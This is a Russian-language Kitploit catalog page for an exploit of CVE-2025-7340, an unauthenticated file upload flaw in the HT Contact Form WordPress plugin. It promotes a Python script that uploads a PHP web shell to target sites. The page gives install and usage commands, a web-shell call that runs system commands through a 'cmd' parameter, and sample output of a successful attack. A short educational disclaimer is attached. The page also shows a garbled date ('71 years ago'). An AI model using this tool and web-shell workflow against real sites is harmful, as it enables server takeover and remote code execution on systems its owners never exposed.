Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-7340 — HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 — Неавторизованная произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-7340
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubnxploited/cve-2025-7340

CVE-2025-7340

HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder. <= 2.2.1 — Неавторизованная произвольная загрузка файлов

Репозиторий
71 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🚨 HT Contact Form Widget <= 2.2.1 - Неаутентифицированная загрузка произвольных файлов (CVE-2025-7340)

CVE: CVE-2025-7340
CVSS: 9.8 (Критический)

📝 Описание

Плагин HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файлов в функции temp_file_upload во всех версиях вплоть до 2.2.1 включительно.

Это позволяет неаутентифицированным злоумышленникам загружать произвольные файлы на сервер, что потенциально может привести к удалённому выполнению кода (RCE).


⚡ Эксплойт-скрипт

Этот репозиторий содержит Python-скрипт эксплойта, который автоматизирует обнаружение уязвимой формы и загружает веб-шелл на целевой сайт.

Скрипт автоматически определяет требуемые параметры (nonce, form_id, ajax endpoint) и загружает PHP-шелл в уязвимый путь.

✅ Пример URL уязвимой формы:

root@kitploit:~
http://target.com/contact/

✅ Уязвимая форма должна находиться на странице, которую вы передаёте в опцию -u.


📦 Требования

Перед запуском скрипта установите необходимые Python-модули:

root@kitploit:~
pip install -r requirements.txt

Содержимое requirements.txt:

root@kitploit:~
requests
colorama

🧰 Использование

root@kitploit:~
usage: CVE-2025-7340.py [-h] 

Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL e.g http(s)://target.com

Параметры:

ПараметрОписание
-h, --helpПоказать это справочное сообщение и выйти
-u, --url URLЦелевой URL, например http(s)://target.com/contact

🐚 Использование веб-шелла

После успешного завершения эксплойта вы можете получить доступ к загруженному шеллу по указанному пути.

Добавьте ?cmd=<your_command>, чтобы выполнять системные команды.

✅ Пример:

root@kitploit:~
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami

🖥️ Пример вывода

root@kitploit:~
Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...

[+] Exploit Successfully!

Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php

Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited

🛑 Отказ от ответственности

Этот инструмент предоставляется только в образовательных и исследовательских целях.
Автор не несёт ответственности за любой ущерб или неправомерное использование этого кода.
Всегда получайте явное разрешение перед тестированием любой системы.


👨‍💻 Автор

Khaled Alenazi (Nxploited)
GitHub: Nxploited

Скачать инструмент